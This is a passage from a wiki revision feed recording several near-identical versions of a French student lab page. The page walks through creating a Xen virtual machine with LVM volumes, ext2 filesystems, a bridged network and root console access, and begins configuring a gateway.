&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=55976</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=55976"/>
				<updated>2021-09-24T07:57:58Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle : */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle : ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Véiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=55975</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=55975"/>
				<updated>2021-09-24T07:57:38Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle : */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle : ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Véiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la MV'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=55971</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=55971"/>
				<updated>2021-09-23T11:59:47Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle : */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle : ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Véiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	</feed>